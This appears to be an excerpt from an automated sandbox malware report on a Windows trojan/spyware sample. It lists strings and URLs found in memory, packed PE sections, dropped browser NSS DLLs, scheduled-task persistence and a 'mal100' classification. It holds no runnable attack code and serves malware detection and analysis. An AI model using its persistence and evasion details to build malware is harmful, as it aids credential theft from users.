Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323422296.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://support.mozilla.org
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://www.mozilla.org
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://www.mozilla.org#
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/-CH
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: CBGCAFIIECBFIDHIJKFBAKEGDG.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name:
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: .idata
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
PE file has nameless sections
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C92B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C92B700
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C92B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C92B8C0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C92B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C92B910
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C8CF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C35A0 0_2_6C8C35A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D6C80 0_2_6C8D6C80
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9234A0 0_2_6C9234A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C92C4A0 0_2_6C92C4A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D64C0 0_2_6C8D64C0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8ED4D0 0_2_6C8ED4D0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C906CF0 0_2_6C906CF0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CD4E0 0_2_6C8CD4E0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C905C10 0_2_6C905C10
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C912C10 0_2_6C912C10
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C93AC00 0_2_6C93AC00
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C93542B 0_2_6C93542B
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D5440 0_2_6C8D5440
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C93545C 0_2_6C93545C
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C900DD0 0_2_6C900DD0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9285F0 0_2_6C9285F0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DFD00 0_2_6C8DFD00
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8F0512 0_2_6C8F0512
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8EED10 0_2_6C8EED10
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C92E680 0_2_6C92E680
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8E5E90 0_2_6C8E5E90
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C924EA0 0_2_6C924EA0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9376E3 0_2_6C9376E3
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CBEF0 0_2_6C8CBEF0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DFEF0 0_2_6C8DFEF0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C907E10 0_2_6C907E10
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C915600 0_2_6C915600
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C929E30 0_2_6C929E30
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C903E50 0_2_6C903E50
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8E4640 0_2_6C8E4640
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8E9E50 0_2_6C8E9E50
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C912E4E 0_2_6C912E4E
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C936E63 0_2_6C936E63
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CC670 0_2_6C8CC670
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9177A0 0_2_6C9177A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CDFE0 0_2_6C8CDFE0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8F6FF0 0_2_6C8F6FF0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C907710 0_2_6C907710
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D9F00 0_2_6C8D9F00
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8F60A0 0_2_6C8F60A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9350C7 0_2_6C9350C7
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8EC0E0 0_2_6C8EC0E0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9058E0 0_2_6C9058E0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D7810 0_2_6C8D7810
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C90B820 0_2_6C90B820
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C914820 0_2_6C914820
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8E8850 0_2_6C8E8850
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8ED850 0_2_6C8ED850
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C90F070 0_2_6C90F070
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C905190 0_2_6C905190
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C922990 0_2_6C922990
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CC9A0 0_2_6C8CC9A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8FD9B0 0_2_6C8FD9B0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8EA940 0_2_6C8EA940
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C91B970 0_2_6C91B970
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C93B170 0_2_6C93B170
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DD960 0_2_6C8DD960
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C93BA90 0_2_6C93BA90
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C932AB0 0_2_6C932AB0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C22A0 0_2_6C8C22A0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8F4AA0 0_2_6C8F4AA0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DCAB0 0_2_6C8DCAB0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C908AC0 0_2_6C908AC0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C90E2F0 0_2_6C90E2F0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8E1AF0 0_2_6C8E1AF0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C909A60 0_2_6C909A60
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8CF380 0_2_6C8CF380
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9353C8 0_2_6C9353C8
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C90D320 0_2_6C90D320
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C5340 0_2_6C8C5340
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DC370 0_2_6C8DC370
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90000 14_2_7EA90000
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90804 14_2_7EA90804
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: String function: 6C8FCBE8 appears 134 times
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: String function: 6C9094D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.000000000186A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe. vs wqmnYoVbHr.exe
Source: wqmnYoVbHr.exe, 00000000.00000002.2323872861.000000006CB45000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs wqmnYoVbHr.exe
Source: wqmnYoVbHr.exe, 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs wqmnYoVbHr.exe
Uses 32bit PE files
Source: wqmnYoVbHr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: wqmnYoVbHr.exe Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: wqmnYoVbHr.exe Static PE information: Section: ZLIB complexity 0.99359130859375
Source: wqmnYoVbHr.exe Static PE information: Section: ZLIB complexity 0.989501953125
Source: AFHDAKJKFC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981541895604396
Source: AFHDAKJKFC.exe.0.dr Static PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9981541895604396
Source: amadka[1].exe.0.dr Static PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
Source: explortu.exe.8.dr Static PE information: Section: ZLIB complexity 0.9981541895604396
Source: explortu.exe.8.dr Static PE information: Section: kvnoqpwr ZLIB complexity 0.9948457731105089
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: cb41bc9329.exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: cb41bc9329.exe.13.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: cb41bc9329.exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/29@0/3
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C927030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C927030
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
